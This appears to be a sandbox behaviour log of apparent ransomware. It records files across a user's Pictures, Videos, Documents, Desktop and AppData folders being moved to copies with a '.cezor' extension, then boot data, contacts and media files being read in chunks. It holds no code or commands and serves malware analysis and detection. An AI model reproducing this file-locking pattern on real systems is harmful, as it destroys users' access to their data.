Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\UYXfotd1.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\UYXfotd1.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\v9Hxi uz2vt-5XDoxdC.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\v9Hxi uz2vt-5XDoxdC.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\wpAW.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\wpAW.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\xRTD4.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\xRTD4.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\Gx9Mb.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\Gx9Mb.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\I42cS5 VvN3aGuFi.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\I42cS5 VvN3aGuFi.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\IE-asuVeDit5fMSdkB0.flv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\IE-asuVeDit5fMSdkB0.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\v2tEOgOZeF-wSXfUeb.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\v2tEOgOZeF-wSXfUeb.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\ZNFPhs7VtfT6Wy.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\ZNFPhs7VtfT6Wy.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\5 wO.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\5 wO.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xIlfywT2BL_f.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xIlfywT2BL_f.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\70Jmk.odp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\70Jmk.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\F0eUqh0cOkUTa7DO.docx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\F0eUqh0cOkUTa7DO.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\FN--.ods.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\FN--.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\K_RwYW.odt.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\K_RwYW.odt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\NxEBIllQ9 cZLQxHAnf.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\NxEBIllQ9 cZLQxHAnf.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\xkuwOm0rA.ods.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\xkuwOm0rA.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\ypdm7CG6ozW8_F3RQh.pps.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\ypdm7CG6ozW8_F3RQh.pps True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\1m7527vbdeC.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\1m7527vbdeC.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\8jZ3LBgNvW1arBclEu8.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\8jZ3LBgNvW1arBclEu8.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\axSg-zF.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\axSg-zF.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\cSaVaB0sUlp.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\cSaVaB0sUlp.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\E5 Uz-9etUMMH3CKQC.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\E5 Uz-9etUMMH3CKQC.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\EWTals.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\EWTals.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\TK27wDdNd6Xfl 2b_k_.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\TK27wDdNd6Xfl 2b_k_.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\Wqelj SIFg-o4.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\Wqelj SIFg-o4.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\kU7oVdD-q0QJXT.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\kU7oVdD-q0QJXT.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\uYUuV.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\uYUuV.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\-1 X.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\-1 X.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\u39sgkNzI3ujT06Y2kP.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\T0CQ8VVBC5Xi_UA\xt72dHYiX\u39sgkNzI3ujT06Y2kP.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\dbOCkvV1nk u.doc.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\dbOCkvV1nk u.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\p-qIG.doc.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\p-qIG.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\RBanc_ Xhdc-T.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\RBanc_ Xhdc-T.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\x46p.rtf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\x46p.rtf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\cpZgjv9AbFGPDH.odt.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\cpZgjv9AbFGPDH.odt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\rBf2xQ.ods.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\KevqRYRLai6W-uOAz\rBf2xQ.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\B2EsvKtcKir28U.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\B2EsvKtcKir28U.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Jf 8.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Jf 8.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\KIbJxOBGwieG.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\KIbJxOBGwieG.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\WTnDwa-D4KBHQUw.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\WTnDwa-D4KBHQUw.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\Kpmxx2VVkoY4H0fX.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\Kpmxx2VVkoY4H0fX.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\5rGtE2ND.flv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\5rGtE2ND.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\ccASAQTIpPKgN.flv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\ccASAQTIpPKgN.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\OTozEY.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\OTozEY.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\M5qZaTsTRd.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\M5qZaTsTRd.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\ykO6fV_h.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Xp-kb7abpIDOqh4\ykO6fV_h.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\9vWEh.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\9vWEh.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\dH-l6u.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\dH-l6u.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\KZ_Ff2.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\KZ_Ff2.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\ziyBrxM6Ba3SqMjEYO.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\ziyBrxM6Ba3SqMjEYO.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\8KFC8j7.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\8KFC8j7.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\K KksBwzXVChJt.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\K KksBwzXVChJt.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\KiC_I4C.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\oADBIR\KiC_I4C.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\-upHLx loeeu-TB.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\-upHLx loeeu-TB.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\8XX4ge15eOKpjI.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\8XX4ge15eOKpjI.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\POBuKqk7p3HVpix_cM.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\POBuKqk7p3HVpix_cM.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\rM0K82IAegAWaw6N.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\rM0K82IAegAWaw6N.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\f NqUp5_D7sMGe.flv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\f NqUp5_D7sMGe.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\h4Ure_SWB.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\h4Ure_SWB.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\RbKeEPsH8.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\RbKeEPsH8.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\shUk4EGQd0zRO ddsru9.mkv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\shUk4EGQd0zRO ddsru9.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\tEhXK0.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\tEhXK0.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\yboEd.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\yboEd.avi True 1
Fn
Read C:\Boot\BOOTSTAT.DAT size = 38, size_out = 38 True 1
Fn
Data
Read C:\Boot\BOOTSTAT.DAT size = 153605, size_out = 65536 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact size = 153605, size_out = 1178 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact size = 153605, size_out = 68382 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact size = 153605, size_out = 1171 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact size = 153605, size_out = 1177 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact size = 153605, size_out = 1174 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact size = 153605, size_out = 1172 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv size = 153605, size_out = 87696 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a size = 153605, size_out = 18617 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp size = 153605, size_out = 86236 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav size = 153605, size_out = 18577 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp size = 153605, size_out = 19688 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav size = 153605, size_out = 33801 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 size = 153605, size_out = 15834 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi size = 153605, size_out = 48538 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3 size = 153605, size_out = 8630 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps size = 153605, size_out = 78062 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp size = 153605, size_out = 91099 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a size = 153605, size_out = 38683 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 size = 153605, size_out = 28382 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf size = 153605, size_out = 78819 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 size = 153605, size_out = 16765 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 size = 153605, size_out = 83893 True 1
Fn
Data
